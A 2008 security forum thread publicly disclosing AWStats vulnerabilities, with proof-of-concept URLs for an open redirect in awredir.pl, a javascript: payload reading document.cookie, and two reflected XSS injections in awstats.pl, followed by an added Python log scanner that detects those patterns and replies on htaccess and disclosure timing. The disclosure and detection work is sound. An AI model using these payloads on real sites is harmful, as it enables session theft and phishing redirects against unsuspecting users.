Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Awstats vulnerabilities
Posted by: tx
Date: July 22, 2008 03:02PM

Well, the awstats team has had a month to fix these (more so for some cases), so FD it is:

Open Redirect (disclosed by trev here: http://sla.ckers.org/forum/read.php?3,505,page=11 ): h+tp://example.com/awstats/awredir.pl?url=http://google.com/
With corresponding XSS: h+tp://example.com/awstats/awredir.pl?url=javascript:alert(document.cookie)

XSS: ht+p://www.example.com/awstats/awstats.pl?config=www.example.com&%22onload=%22alert(document.domain)//

EDIT: Forgot one (xss) ht+p://www.example.com/awstats/awstats.pl?config=www.example.com&framename=mainright&output=unknownip%22onmouseover%3D%22alert(document.domain)//

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 07/22/2008 03:07PM by tx.
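
A defender-side check for the request patterns listed in the post above, as an added example that is not part of the original thread or of AWStats itself: it flags awredir.pl targets that are not http(s) URLs on an allow-listed host, and awstats.pl parameters carrying quote or angle-bracket characters. The allow-list, the log lines and all function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_HOSTS = {"www.example.com", "example.com"}  # assumption: hosts you redirect to
REQUEST_RE = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+"')

# Constructed access-log lines (common log format) built from the URLs in the post.
SAMPLE_LOG = [
    '192.0.2.10 - - [22/Jul/2008:15:02:00 +0000] "GET /awstats/awredir.pl?url=http://google.com/ HTTP/1.1" 302 -',
    '192.0.2.10 - - [22/Jul/2008:15:02:05 +0000] "GET /awstats/awredir.pl?url=javascript:alert(document.cookie) HTTP/1.1" 302 -',
    '192.0.2.11 - - [22/Jul/2008:15:03:00 +0000] "GET /awstats/awstats.pl?config=www.example.com&%22onload=%22alert(document.domain)// HTTP/1.1" 200 512',
    '192.0.2.11 - - [22/Jul/2008:15:07:00 +0000] "GET /awstats/awstats.pl?config=www.example.com&framename=mainright&output=unknownip%22onmouseover%3D%22alert(document.domain)// HTTP/1.1" 200 512',
    '192.0.2.12 - - [22/Jul/2008:15:09:00 +0000] "GET /awstats/awstats.pl?config=www.example.com&output=unknownip HTTP/1.1" 200 512',
    '192.0.2.12 - - [22/Jul/2008:15:09:30 +0000] "GET /awstats/awredir.pl?url=http://www.example.com/report HTTP/1.1" 302 -',
]

def redirect_target_ok(target):
    """Accept only absolute http(s) URLs whose host is on the allow-list."""
    try:
        parts = urlsplit(target.strip())
    except ValueError:  # malformed authority, e.g. unbalanced IPv6 brackets
        return False
    return parts.scheme.lower() in ALLOWED_SCHEMES and (parts.hostname or "") in ALLOWED_HOSTS

def classify(request_uri):
    """Return findings for one request URI; an empty list means nothing flagged."""
    parts = urlsplit(request_uri)
    findings = []
    # parse_qsl percent-decodes names and values, so %22 is seen as a double quote.
    # Names are checked too: one case in the post puts the quote in the parameter name.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if parts.path.endswith("/awredir.pl"):
            if name == "url" and not redirect_target_ok(value):
                findings.append("awredir.pl: redirect target not allow-listed")
        elif parts.path.endswith("/awstats.pl"):
            if any(ch in name + value for ch in "\"'<>"):
                findings.append("awstats.pl: markup characters in parameter %r" % name)
    return findings

def scan(lines):
    """Map each flagged request URI found in the log lines to its findings."""
    flagged = {}
    for line in lines:
        match = REQUEST_RE.search(line)
        if match and classify(match.group(1)):
            flagged[match.group(1)] = classify(match.group(1))
    return flagged
```
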

Re: Awstats vulnerabilities
Posted by: Gareth Heyes
Date: July 22, 2008 04:29PM

A good idea when installing these types of programs is to protect them with htaccess as well as using their own auth. This protects against XSS attacks and CSRF.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: Awstats vulnerabilities
Posted by: tx
Date: July 22, 2008 04:37PM

Yeah, htaccess will prevent the XSS flaws in awstats.pl, but most sysadmins tend to not restrict access to awredir.pl because, well, that pretty much negates the usefulness of that script (although it's debatable whether that usefulness is actually worth it).

-tx @ lowtech-labs.org

Re: Awstats vulnerabilities
Posted by: tx
Date: July 28, 2008 12:40PM

Quote

ht+p://www.example.com/awstats/awstats.pl?config=www.example.com&%22onload=%22alert(document.domain)//
- FIXED

Responsible Disclosure: Not even so much as a response in a month.
Full Disclosure: Issue fixed in less than a week.

Score: Responsible Disclosure = 0; Full Disclosure = 1

(There are still the awredir.pl issues outstanding though...)

-tx @ lowtech-labs.org

Re: Awstats vulnerabilities
Posted by: asilvermtzion
Date: August 01, 2008 06:59PM

Why wait a month? You should set a minimum period for acknowledgement and a later date for fix implementation, and let them know that up front.
